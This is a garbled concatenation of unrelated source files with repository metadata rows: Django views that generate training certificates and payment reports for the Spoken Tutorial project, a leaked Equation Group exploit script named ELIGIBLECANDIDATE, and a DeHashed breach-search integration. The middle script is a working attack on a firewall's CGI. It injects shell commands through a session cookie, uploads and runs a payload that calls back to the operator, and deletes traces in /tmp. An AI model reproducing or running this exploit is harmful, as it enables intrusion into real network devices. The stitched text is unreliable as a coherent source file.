messages.add_message(request, messages.WARNING, "Institution "+row[2]+" already made payment on "+row[9])
else:
csv_error = True
messages.add_message(request, messages.ERROR, " Academic payment for " + row[2]+" already exists")
if csv_error:
messages.warning(request, 'Some rows in the csv file has errors and are not created.')
if count > 0:
messages.success(request, 'Successfully uploaded '+str(count)+" Institutions")
return render(request,'upload_college_details.html',context)
else:
return render(request,'upload_college_details.html',context)
return render(request,'upload_college_details.html',context)
def add_Academic_key(ac_pay_status_object, subscription):
u_key = uuid.uuid1()
hex_key = u_key.hex
Subscription_time = int(subscription)
expiry_date = ac_pay_status_object.payment_date + timedelta(days=Subscription_time)
ac_key = AcademicKey()
ac_key.ac_pay_status = ac_pay_status_object
ac_key.academic = ac_pay_status_object.academic
ac_key.u_key = u_key
ac_key.hex_key = hex_key
ac_key.expiry_date = expiry_date
ac_key.save()
class FDPTrainingCertificate(object):
def custom_strftime(self, format, t):
return t.strftime(format).replace('{S}', str(t.day) + self.suffix(t.day))
def suffix(self, d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
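# For example, custom_strftime('{S} %B %Y', date(2020, 3, 1)) renders as
# '1st March 2020' (illustrative date).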
def create_fdptraining_certificate(self, event, participantname):
training_start = event.event_start_date
training_end = event.event_end_date
event_type = event.event_type
response = HttpResponse(content_type='application/pdf')
filename = (participantname+'-'+event.foss.foss+"-Participant-Certificate").replace(" ", "-");
response['Content-Disposition'] = 'attachment; filename='+filename+'.pdf'
imgTemp = BytesIO ()
imgDoc = canvas.Canvas(imgTemp)
# Title
imgDoc.setFont('Helvetica', 35, leading=None)
imgDoc.drawCentredString(405, 470, "Certificate of Participation")
#password
certificate_pass = ''
imgDoc.setFillColorRGB(211, 211, 211)
imgDoc.setFont('Helvetica', 10, leading=None)
imgDoc.drawString(10, 6, certificate_pass)
# Draw image on Canvas and save PDF in buffer
imgPath = settings.MEDIA_ROOT +"sign.jpg"
imgDoc.drawImage(imgPath, 600, 100, 150, 76)
# paragraph
text = "This is to certify that <b>"+participantname +"</b> has participated in \
<b>"+event.get_event_type_display()+"</b> from <b>"\
+ str(training_start) +"</b> to <b>"+ str(training_end) +\
"</b> on <b>"+event.foss.foss+"</b> organized by <b>"+\
event.host_college.institution_name+\
"</b> with course material provided by Spoken Tutorial Project, IIT Bombay.\
<br /><br /> This training is offered by the Spoken Tutorial Project, IIT Bombay."
centered = ParagraphStyle(name = 'centered',
fontSize = 16,
leading = 30,
alignment = 0,
spaceAfter = 20
)
p = Paragraph(text, centered)
p.wrap(650, 200)
p.drawOn(imgDoc, 4.2 * cm, 7 * cm)
imgDoc.save()
# Use PyPDF to merge the image-PDF into the template
if event_type == "FDP":
page = PdfFileReader(open(settings.MEDIA_ROOT +"fdptr-certificate.pdf","rb")).getPage(0)
else:
page = PdfFileReader(open(settings.MEDIA_ROOT +"tr-certificate.pdf","rb")).getPage(0)
overlay = PdfFileReader(BytesIO(imgTemp.getvalue())).getPage(0)
page.mergePage(overlay)
#Save the result
output = PdfFileWriter()
output.addPage(page)
#stream to browser
outputStream = response
output.write(response)
outputStream.close()
return response
class EventTrainingCertificateView(FDPTrainingCertificate, View):
template_name = ""
def dispatch(self, *args, **kwargs):
return super(EventTrainingCertificateView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
eventid = self.request.POST.get("eventid")
print(eventid)
event = TrainingEvents.objects.get(id=eventid)
participantname = self.request.user.first_name+" "+self.request.user.last_name
if event:
return self.create_fdptraining_certificate(event, participantname)
else:
messages.error(self.request, "Permission Denied!")
return HttpResponseRedirect("/")
class ParticipantTransactionsListView(ListView):
model = PaymentTransaction
raw_get_data = None
header = None
collection = None
@method_decorator(group_required("Resource Person","Administrator"))
def dispatch(self, *args, **kwargs):
today = date.today()
statenames = State.objects.filter(resourceperson__user_id=self.request.user, resourceperson__status=1).values('name')
self.PaymentTransaction = PaymentTransaction.objects.filter(paymentdetail__state__in=statenames).order_by('-created')
self.events = self.PaymentTransaction
self.header = {
1: SortableHeader('#', False),
2: SortableHeader(
'paymentdetail__user__first_name',
True,
'First Name'
),
3: SortableHeader(
'paymentdetail__user__last_name',
True,
'Last Name'
),
4: SortableHeader(
'paymentdetail__email',
True,
'Email'
),
5: SortableHeader(
'paymentdetail__state',
True,
'State'
),
6: SortableHeader('transId', True, 'Transaction id'),
7: SortableHeader('paymentdetail__user_id', True, 'UserId'),
8: SortableHeader('refNo', True, 'Reference No.'),
9: SortableHeader('status', True, 'Status'),
10: SortableHeader('paymentdetail__purpose', True, 'Purpose'),
11: SortableHeader('requestType', True, 'RequestType'),
12: SortableHeader('amount', True, 'Amount'),
13: SortableHeader('created', True, 'Entry Date'),
14: SortableHeader('paymentdetail__user', True, 'Phone'),
}
self.raw_get_data = self.request.GET.get('o', None)
self.purpose = self.request.GET.get('paymentdetail__purpose')
if self.purpose != 'cdcontent':
self.events= self.events.filter().exclude(paymentdetail__purpose='cdcontent')
self.queryset = get_sorted_list(
self.request,
self.events,
self.header,
self.raw_get_data
)
self.collection= PaymentTransFilter(self.request.GET, queryset=self.queryset, user=self.request.user)
self.total_amount = self.collection.qs.filter(requestType='R').aggregate(Sum('amount'))
return super(ParticipantTransactionsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ParticipantTransactionsListView, self).get_context_data(**kwargs)
context['form'] = self.collection.form
page = self.request.GET.get('page')
collection = get_page(self.collection.qs, page)
context['collection'] = collection
context['header'] = self.header
context['ordering'] = get_field_index(self.raw_get_data)
context['events'] = self.events
context['total_amount']=self.total_amount
if self.request.user:
context['user'] = self.request.user
return context
@csrf_exempt
def ajax_collage_event(request):
""" Ajax: Get the Colleges (Academic) based on District selected """
if request.method == 'POST':
college = request.POST.get('college')
print(college)
events = TrainingEvents.objects.filter(host_college_id=college).order_by('event_name')
print(events)
tmp = '<option value = None> --------- </option>'
if events:
for i in events:
tmp +='<option value='+str(i.id)+'>'+i.event_name+', '+i.event_type+'</option>'
return HttpResponse(json.dumps(tmp), content_type='application/json')
@csrf_protect
@login_required
def participant_transactions(request, purpose):
user = User.objects.get(id=request.user.id)
rp_states = ResourcePerson.objects.filter(status=1,user=user)
state = State.objects.filter(id__in=rp_states.values('state')).values('name')
context = {}
if request.method == 'GET':
form = TrainingManagerPaymentForm(user,request.GET)
allpaydetails = get_transaction_details(request, purpose)
request_type = request.GET.get('request_type')
if request_type == 'R':
context['total'] = allpaydetails.aggregate(Sum('amount'))
# else:
# form = TrainingManagerPaymentForm(user=request.user)
context['form'] = form
context['user'] = user
context['transactiondetails'] = allpaydetails
context['purpose'] = purpose
return render(request,'participant_transaction_list_new.html', context)
def transaction_csv(request, purpose):
# export statistics training data as csv
collectionSet = None
collection = get_transaction_details(request, purpose)
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="training-statistics-data.csv"'
writer = csv.writer(response)
# header
if purpose != 'cdcontent':
writer.writerow(['Sr No', 'Event Details','Name', 'Email','State','User Id','Transaction Id',\
'Reference No','Status','Request Type','Amount','Entry Created','Phone Number'])
else:
writer.writerow(['Sr No', 'Name', 'Email','State','User Id','Transaction Id',\
'Reference No','Status','Request Type','Amount','Entry Created','Phone Number'])
count = 0
# records
for record in collection:
count=count+1
phone = get_user_detail(record.paymentdetail.user)
if purpose != 'cdcontent':
event = get_event_details(record.paymentdetail.purpose)
writer.writerow([count,
event.event_name+','+event.foss.foss,
record.paymentdetail.user.first_name+' '+record.paymentdetail.user.last_name,
record.paymentdetail.email,
record.paymentdetail.state,
record.paymentdetail.user_id,
record.transId,
record.refNo,
record.status,
record.requestType,
record.amount,
record.created,
phone])
else:
writer.writerow([count,
record.paymentdetail.user.first_name+' '+record.paymentdetail.user.last_name,
record.paymentdetail.email,
record.paymentdetail.state,
record.paymentdetail.user_id,
record.transId,
record.refNo,
record.status,
record.requestType,
record.amount,
record.created,
phone])
return response
def reopen_event(request, eventid):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=eventid)
if event:
event.training_status = 0 # reopen event
event.save()
messages.success(request, 'Event reopened successfully. As the event date is over, you will find this entry under the expired tab.')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/completed/")
class EventParticipantsListView(ListView):
queryset = ""
unsuccessful_payee = ""
paginate_by = 500
success_url = ""
def dispatch(self, *args, **kwargs):
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
main_query = Participant.objects.filter(event_id=kwargs['eventid'])
self.queryset = main_query.filter(Q(payment_status__status=1)| Q(registartion_type__in=(1,3)))
# self.unsuccessful_payee = main_query.filter(payment_status__status__in=(0,2))
if self.event.training_status == 1:
self.queryset = main_query.filter(reg_approval_status=1)
if self.event.training_status == 2:
self.queryset = self.event.eventattendance_set.all()
return super(EventParticipantsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventParticipantsListView, self).get_context_data(**kwargs)
context['event'] = self.event
context['eventid'] = self.event.id
return context
@csrf_exempt
def ajax_add_teststatus(request):
partid = int(request.POST.get("partid"))
mdlcourseid = int(request.POST.get("mdlcourseid"))
mdlquizid = int(request.POST.get("mdlquizid"))
fossid = int(request.POST.get("fossid"))
eventid = int(request.POST.get("eventid"))
fossId = FossCategory.objects.get(id=fossid)
useremail = request.user.email
testentry = EventTestStatus()
testentry.participant_id= partid
testentry.event_id = eventid
testentry.mdlemail = useremail
testentry.fossid = fossId
testentry.mdlcourse_id = mdlcourseid
testentry.mdlquiz_id = mdlquizid
testentry.mdlattempt_id = 0
hasPrevEntry = EventTestStatus.objects.filter(participant_id=partid, event_id=eventid, mdlemail=useremail, fossid=fossId, mdlcourse_id=mdlcourseid, mdlquiz_id=mdlquizid, part_status__lt=2).first()
check = False
if not hasPrevEntry:
try:
testentry.save()
check = True
except:
check = False
else:
check = True
return HttpResponse(json.dumps(check), content_type='application/json')
class ILWTestCertificate(object):
def custom_strftime(self, format, t):
return t.strftime(format).replace('{S}', str(t.day) + self.suffix(t.day))
def suffix(self, d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def create_ilwtest_certificate(self, event, participantname, teststatus):
training_start = event.event_start_date
training_end = event.event_end_date
event_type = event.event_type
response = HttpResponse(content_type='application/pdf')
filename = (participantname+'-'+teststatus.fossid.foss+"-Participant-Test-Certificate").replace(" ", "-");
response['Content-Disposition'] = 'attachment; filename='+filename+'.pdf'
imgTemp = BytesIO ()
imgDoc = canvas.Canvas(imgTemp)
# Title
imgDoc.setFont('Helvetica', 25, leading=None)
imgDoc.drawCentredString(405, 470, "Certificate for Completion of Training")
#password
certificate_pass = ''
if teststatus.cert_code:
certificate_pass = teststatus.cert_code
teststatus.part_status = 3 #certificate downloaded test over
teststatus.save()
else:
certificate_pass = str(teststatus.participant_id)+id_generator(10-len(str(teststatus.participant_id)))
teststatus.cert_code = certificate_pass
teststatus.part_status = 3 #certificate downloaded test over
teststatus.save()
imgDoc.setFillColorRGB(211, 211, 211)
imgDoc.setFont('Helvetica', 10, leading=None)
imgDoc.drawString(10, 6, certificate_pass)
# Draw image on Canvas and save PDF in buffer
imgPath = settings.MEDIA_ROOT +"sign.jpg"
imgDoc.drawImage(imgPath, 600, 100, 150, 76)
# paragraph
text = "This is to certify that <b>"+participantname +"</b> successfully passed a \
<b>"+teststatus.fossid.foss+"</b> test, remotely conducted by the Spoken Tutorial project, IIT Bombay, under an honour invigilation system.\
<br /> Self learning through Spoken Tutorials and passing an online test completes the training programme."
centered = ParagraphStyle(name = 'centered',
fontSize = 16,
leading = 30,
alignment = 0,
spaceAfter = 20
)
p = Paragraph(text, centered)
p.wrap(650, 200)
p.drawOn(imgDoc, 4.2 * cm, 7 * cm)
imgDoc.save()
# Use PyPDF to merge the image-PDF into the template
if event_type == "FDP":
page = PdfFileReader(open(settings.MEDIA_ROOT +"fdptr-certificate.pdf","rb")).getPage(0)
else:
page = PdfFileReader(open(settings.MEDIA_ROOT +"tr-certificate.pdf","rb")).getPage(0)
overlay = PdfFileReader(BytesIO(imgTemp.getvalue())).getPage(0)
page.mergePage(overlay)
#Save the result
output = PdfFileWriter()
output.addPage(page)
#stream to browser
outputStream = response
output.write(response)
outputStream.close()
return response
class EventTestCertificateView(ILWTestCertificate, View):
template_name = ""
def dispatch(self, *args, **kwargs):
return super(EventTestCertificateView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
eventid = self.request.POST.get("eventid")
print(eventid)
event = TrainingEvents.objects.get(id=eventid)
participantname = self.request.user.first_name+" "+self.request.user.last_name
teststatus = EventTestStatus.objects.filter(event_id=eventid, fossid=kwargs['testfossid'], mdlemail=self.request.user.email).first()
if event:
return self.create_ilwtest_certificate(event, participantname, teststatus)
else:
messages.error(self.request, "Permission Denied!")
return HttpResponseRedirect("/")
| gpl-3.0 | 419,593,190,258,104,260 | 33.176418 | 197 | 0.70187 | false |
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/ELCA/eligiblecandidate.py | 1 | 5274 | #!/usr/bin/env python2.7
import sys
import tarfile
from time import ctime,sleep
from StringIO import StringIO
from fosho import HTTPSExploit,run_exploit,randstr
from fosho.requests.exceptions import *
class ELCAExploit(HTTPSExploit):
name = "ELIGIBLECANDIDATE"
version = "v1.1.0.1"
desc="What is the sound of a single thread blocking?"
modes = ["nopen"]
exploit_url= "/cgi/maincgi.cgi"
target_url= "/site/image/white.gif"
stagerfn = "stage/stager.sh"
tinyexec = "stage/tiny-exec/tiny-exec"
setlog = "stage/setlog/setlog"
required_exploit = HTTPSExploit.required_exploit+["cid"]
required_probe = ["cid"]
required_survey = ["cid"]
required_clean = ["cid"]
timeout = 120
cfg = "ELCA.cfg"
@classmethod
def add_args(cur,cls):
parser,subparsers = HTTPSExploit.add_args(cls)
egroup = parser.add_argument_group("%s Options" %
cls.name)
egroup.add_argument("--cid",type=str,help="Name of session ID in cookie (default: auto)")
return parser,subparsers
def touch(self,resp=None):
if not resp:
resp = self.head(self.target_url)
if 'etag' in resp.headers:
etag,date = self._parse_etag(resp.headers['etag'])
##
self.log.info("Etag - %s; Last modified - %s" % (etag,date))
def probe(self):
target = "/site/pages/index.html"
self.log.info("Checking current %s etag" % target)
old = self.get_etag(target)
##
sleep(1)
self.log.info("Running touch on %s" % target)
self._run_cmd("touch /w*/*/*/p*/*")
self.log.info("Checking etag again to confirm")
new = self.get_etag(target)
if new[0] == old[0]:
return "Unable to touch %s" % target
def exploit(self):
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._upload_run()
def clean(self):
''''''
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._run_cmd("rm -f /t*/.a")
self._run_cmd("rm -f /t*/.te*")
def build_nopen_exploit_payload(self):
##
cmd = "./htttpd %s D=-c%s tos_configd &" % ("./httpd",self.ns.callback)
self.build_exploit_payload(cmd)
def build_exploit_payload(self,cmd="/tmp/httpd"):
##
out = StringIO()
tf = tarfile.open(mode="w:gz",fileobj=out)
##
tf.dereference = True
try:
tf.add(self.tinyexec,arcname='htttpd')
tf.add(self.binpath,arcname='httpd')
tf.add(self.setlog,arcname='httppd')
##
except IOError, e:
self.log.error("Couldn't find file. Ensure paths are correct and you have run make.")
raise e
tf.close()
out.seek(0)
tdata = out.read()
self.folder = randstr(5)
stager = ""
for i,l in enumerate(open(self.stagerfn).readlines()):
if i == 0 or not l.strip().startswith("#"):
stager+=l
##
##
flen = len(stager.format(rand=self.folder,flen=len(stager),cmd=cmd))
self.payload = stager.format(rand=self.folder,flen=flen,cmd=cmd)
self.payload += tdata
def _get_cid(self):
''''''
if self.cid:
self.log.info("Already know cookie id: %s" % self.cid)
return self.cid
try:
cid = self.get(self.exploit_url).cookies.keys()[0]
self.log.info("Detected cookie id: %s" % cid)
return cid
except IndexError:
self.log.warning("Could not reliably detect cookie. Using 'session_id'...")
return "session_id"
def _upload_run(self):
self.log.info("Uploading and moving file...")
p = StringIO(self.payload)
if not self.cid:
self._get_cid()
self.post(self.exploit_url,cookies={self.cid:"x`cp /t*/cg* /tmp/.a`"},
files={randstr(5):p})
self.log.info("Making file executable...")
self._run_cmd("chmod +x /tmp/.a")
self.log.info("Running payload...")
try:
self._run_cmd("/tmp/.a",quiet=True)
except KeyboardInterrupt:
self.log.info("Closed manually by user. Exiting...")
except Timeout:
self.log.info("Connection timed out. Only a problem if the callback was not received.")
def _run_cmd(self,cmd,quiet=False,raw=False):
if quiet:
cmd = "%s 2>&1" % cmd
if not raw:
cmd = "x`%s`" % cmd
if len(cmd) > 24:
self.log.warning("Command is longer than 24 bytes: %s" % cmd)
self.continue_prompt("Are you sure you want to run this? (y/N) ")
if not self.cid:
self._get_cid()
self.log.debug("Running command on target: %s" % cmd)
return self.get(self.exploit_url,cookies={self.cid:cmd})
def _parse_etag(self,etag):
etag = etag.split("/")[-1].strip('"')
date = ctime(int(etag.split("-")[-1],16))
return etag,date
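# e.g. an Etag header value of '"abc-1f4-4e5d6c7a"' parses to
# ('abc-1f4-4e5d6c7a', ctime(0x4e5d6c7a)) -- the trailing hex field is the
# file's mtime (illustrative value).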
def main():
run_exploit(ELCAExploit)
if __name__=="__main__":
main()
| unlicense | 518,061,169,539,913,150 | 29.485549 | 99 | 0.546454 | false |
zaibacu/wutu | wutu/app.py | 1 | 1626 | import sys
import jinja2
from flask import Flask, render_template, Response
from flask_restful import Api
from functools import lru_cache
from wutu.util import *
from wutu.compiler.common import create_base, create_stream, get_data
class CustomFlask(Flask):
"""
    Flask subclass with AngularJS-friendly Jinja variable delimiters ({< >} instead of {{ }})
"""
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
variable_start_string='{<',
variable_end_string='>}',
))
def create(index="index.html", ngmodules=None, minify=True, locator=current):
"""
Creates wutu app
    :param index: html file for index page
    :param ngmodules: optional Angular modules passed through to the generated base script
    :param minify: whether to minify the generated JavaScript (set False when debugging)
    :param locator: function which tells where to find templates
:return:
"""
app = CustomFlask(__name__)
api = Api(app)
app.jinja_loader = jinja2.FileSystemLoader(locator())
api.jsstream = create_stream()
create_base(api.jsstream, ngmodules)
@app.route("/")
def index_page():
"""
Endpoint for base page
:return:
"""
try:
return render_template(index)
except IOError:
return "Failed to render template {0}, error: Not found".format(index)
    # route decorator goes outermost so the lru_cache-wrapped function is
    # what Flask registers and serves
    @app.route("/wutu.js")
    @lru_cache()
def wutu_js():
if minify:
from jsmin import jsmin
jsdata = jsmin(get_data(api.jsstream))
else:
from jsbeautifier import beautify
jsdata = beautify(get_data(api.jsstream))
return Response(jsdata, mimetype="text/javascript")
app.api = api
return app
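
# A minimal usage sketch (assumes an 'index.html' template findable by the
# default locator; not part of the original module):
# if __name__ == "__main__":
#     create(minify=False).run(debug=True)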
| mit | 2,517,502,439,025,025,000 | 26.559322 | 98 | 0.630996 | false |
danielfbm/thrift-demo | tasks/newserver.py | 1 | 2910 | import thriftpy
tasks = thriftpy.load("tasks.thrift", module_name="tasks_thrift")
from thriftpy.rpc import make_server
from thriftpy.protocol import TJSONProtocolFactory
from db import TaskDB
import logging
logging.basicConfig()
from config import Config
class TaskHandler(object):
def all(self, userId):
print('getting all tasks for user: %s' % userId)
cursor = TaskDB.all(userId)
result = []
task = None
for t in cursor:
task = tasks.Task()
task.id = str(t['_id'])
task.name = t['name']
task.createdOn = t['createdOn'].isoformat()
task.userId = t['userId']
task.done = t['done']
result.append(task)
return result
def add(self, userId, name):
print('add(%s,%s)' % (userId, name))
instance = TaskDB.addOne(userId, name)
task = TaskHandler.convertInstance(instance)
return task
def update(self, id, name, done, userId):
        print('update(%s, %s, %s, %s)' % (id, name, done, userId))
instance = TaskDB.updateOne(id, name, done, userId)
if (instance == None):
exception = tasks.BaseException()
exception.code = 404
            exception.message = 'Task not found'
raise exception
task = TaskHandler.convertInstance(instance)
return task
def upsert(self, task):
print('upsert(%s)' % (task))
        if (task is None):
            exception = tasks.BaseException()
            exception.code = 400
            exception.message = 'Task data is invalid'
            raise exception
try:
if (task.id is not None):
                # argument order matches update() above; the exact order the
                # (unseen) TaskDB.updateOne expects is an assumption here
                instance = TaskDB.updateOne(task.id, task.name, task.done, task.userId)
else:
instance = TaskDB.addOne(task.userId, task.name)
        except Exception:
exception = tasks.BaseException()
exception.code = 400
            exception.message = 'Unknown error'
raise exception
print(instance)
if (instance is None):
exception = tasks.BaseException()
exception.code = 404
exception.message = 'Task not found'
raise exception
task = TaskHandler.convertInstance(instance)
return task
@staticmethod
def convertInstance(instance):
task = tasks.Task()
task.id = str(instance['_id'])
task.userId = instance['userId']
task.name = instance['name']
task.createdOn = instance['createdOn'].isoformat()
task.done = instance['done']
return task
host = Config.getTaskServiceConfig()['host']
port = Config.getTaskServiceConfig()['port']
print('Server is running on %s port %d' % (host, port))
server = make_server(tasks.Tasks,
TaskHandler(),
host,
port)
server.serve()
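
# A minimal client sketch for this service (host/port reuse the config above;
# thriftpy's make_client is the counterpart of make_server):
# from thriftpy.rpc import make_client
# client = make_client(tasks.Tasks, host, port)
# print(client.all('some-user-id'))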
| mit | 6,803,115,992,219,003,000 | 28.693878 | 87 | 0.571478 | false |
zhangyage/Python-oldboy | day11/day11_Django/day11_Django/settings.py | 1 | 2738 | # -*- coding:utf-8 -*-
"""
Django settings for day11_Django project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f4#sx65y-0@=d4js9qnq#0b-wnh-r$w2xsf^*ek9@@1*%lzk()'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# Specify where our template files live; note the trailing comma below is required
TEMPLATE_DIRS = (
os.path.join(BASE_DIR,'template'),
)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
    # our own app has to be registered here
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
    # commenting out the line above disables Django's CSRF protection, avoiding cross-site request forgery errors in our setup
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'day11_Django.urls'
WSGI_APPLICATION = 'day11_Django.wsgi.application'
# MySQL connection/driver settings
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'day11',
'USER':'zhangyage',
'PASSWORD':'zhangyage',
'HOST':'192.168.75.133',
'PORT':'3306',
}
}
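# Note: the mysql backend above assumes a MySQLdb-compatible driver is
# installed (MySQL-python on Python 2, or mysqlclient); quick check:
#   python -c "import MySQLdb"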
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
# path where static files are stored
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR,'static'),
)
| apache-2.0 | -3,399,185,197,010,899,500 | 22.925926 | 71 | 0.68808 | false |
demisto/content | Packs/DeHashed/Integrations/DeHashed/DeHashed.py | 1 | 11742 | from typing import Union, Dict, Optional, List
from CommonServerPython import * # noqa: E402 lgtm [py/polluting-import]
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
INTEGRATION_CONTEXT_BRAND = "DeHashed"
BASE_URL = "https://api.dehashed.com/"
RESULTS_FROM = 1
RESULTS_TO = 50
class Client(BaseClient):
def __init__(
self,
base_url,
verify=True,
proxy=False,
ok_codes=None,
headers=None,
auth=None,
email=None,
api_key=None,
email_dbot_score='SUSPICIOUS'
):
super().__init__(
base_url,
verify=verify,
proxy=proxy,
ok_codes=ok_codes,
headers=headers,
auth=auth,
)
self.email = email
self.api_key = api_key
self.email_dbot_score = email_dbot_score
def dehashed_search(self, asset_type: Optional[str], value: List[str], operation: Optional[str],
results_page_number: Optional[int] = None) -> dict:
"""
this function gets query parameters from demisto and perform a "GET" request to Dehashed api
        :param asset_type: email, ip_address, username, hashed_password, name, vin, address, phone, all_fields.
:param value: value to search
:param operation: choose a search type to perform.
:param results_page_number: a page number to get. every page contains 5,000 entries.
        :return: a dictionary containing: a list of entries that match the query, the total number of results that
        exist for the given query, request status, how much time the request took, and balance.
"""
if not value:
raise DemistoException('This command must get "value" as argument')
query_value = ""
if len(value) > 1:
if operation == "is":
query_value = " ".join((f'"{value}"' for value in value))
elif operation == "contains":
query_value = " OR ".join(value)
query_value = f"({query_value})"
elif operation == "regex":
query_value = " ".join((f"/{value}/" for value in value))
else:
if operation == "is":
query_value = f'"{value[0]}"'
elif operation == "contains":
query_value = value[0]
elif operation == 'regex':
query_value = f"/{value[0]}/"
if asset_type == "all_fields":
query_string = f"{query_value}"
else:
query_string = f"{asset_type}:{query_value}"
if results_page_number:
return self._http_request(
"GET",
"search",
params={"query": query_string, "page": results_page_number},
auth=(self.email, self.api_key),
timeout=25,
)
else:
return self._http_request(
"GET",
"search",
params={"query": query_string},
auth=(self.email, self.api_key),
timeout=25
)
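# Illustrative query strings the method above produces:
#   asset_type='email', value=['a@x.io'], operation='is'       -> email:"a@x.io"
#   asset_type='email', value=['a', 'b'], operation='contains' -> email:(a OR b)
#   asset_type='all_fields', value=['foo'], operation='regex'  -> /foo/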
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
Args:
client: DeHashed client
Returns:
'ok' if test passed, anything else will fail the test.
"""
result = client.dehashed_search(
asset_type="vin", value=["test", "test1"], operation="is"
)
if isinstance(result, dict):
return "ok"
else:
return f"Test failed because got unexpected response from api: {result}"
def validate_filter_parameters(results_from_value, results_to_value):
    if results_from_value <= 0:
        raise DemistoException(f'Argument "results_from" expected to be greater than zero, but given:'
                               f' {results_from_value}')
    elif results_to_value <= 0:
        raise DemistoException(f'Argument "results_to" expected to be greater than zero, but given:'
                               f' {results_to_value}')
    elif results_from_value > results_to_value:
        raise DemistoException('Argument "results_from" expected to be less than or equal to "results_to"')
def filter_results(
entries: list, results_from: Union[int, None], results_to: Union[int, None]
) -> tuple:
"""
gets raw results returned from the api and limit the number of entries to return to demisto
:param entries: search results of the performed query
:param results_from: start range
:param results_to: end range
:return: filtered results
"""
if not results_from:
results_from = RESULTS_FROM
if not results_to:
results_to = RESULTS_TO
if results_to > len(entries):
results_to = len(entries)
    validate_filter_parameters(results_from, results_to)
return entries[results_from - 1:results_to], results_from, results_to
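# e.g. entries=[e1, e2, e3, e4, e5], results_from=2, results_to=4
#      -> (entries[1:4], 2, 4), i.e. a 1-based inclusive range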
def arg_to_int(arg_val: Optional[str], arg_name: Optional[str]) -> Optional[int]:
"""
converts commands arguments to integers
:param arg_name: argument name
:param arg_val: value to convert to int
:return: converted argument as int
"""
if arg_val is None:
return None
if not isinstance(arg_val, str):
return None
try:
result = int(arg_val)
if result <= 0:
raise DemistoException(f'"{arg_name}" expected to be greater than zero.')
return result
except ValueError:
raise DemistoException(
f'"{arg_name}" expected to be Integer. passed {arg_val} instead.'
)
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': dbot_score
}
def dehashed_search_command(client: Client, args: Dict[str, str]) -> tuple:
"""
this command returns data regarding a compromised assets given as arguments
:param client: Demisto client
:param args:
    - asset_type: email, ip_address, username, hashed_password, name, vin, address, phone, all_fields.
- value: value to search
- operation: choose a search type to perform.
- results_page_number: a page number to get. every page contains 5,000 entries.
- results_from: sets result's start range
- results_to: sets result's end range
:return: Demisto outputs
"""
asset_type = args.get("asset_type")
operation = args.get("operation")
value = argToList(args.get("value"))
results_page_number = arg_to_int(args.get("page"), "page")
results_from = arg_to_int(args.get("results_from"), "results_from")
results_to = arg_to_int(args.get("results_to"), "results_to")
result = client.dehashed_search(asset_type, value, operation, results_page_number)
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
return "No matching results found", None, None
else:
filtered_results, results_from, results_to = filter_results(
query_data, results_from, results_to
)
query_entries = createContext(
filtered_results, keyTransform=underscoreToCamelCase
)
headers = [key.replace("_", " ") for key in [*filtered_results[0].keys()]]
if not results_page_number:
results_page_number = 1
last_query = {
"ResultsFrom": results_from,
"ResultsTo": results_to,
"DisplayedResults": len(filtered_results),
"TotalResults": result.get("total"),
"PageNumber": results_page_number
}
return (
tableToMarkdown(
f'DeHashed Search - got total results: {result.get("total")}, page number: {results_page_number}'
f', page size is: {len(filtered_results)}. returning results from {results_from} to {results_to}.',
filtered_results,
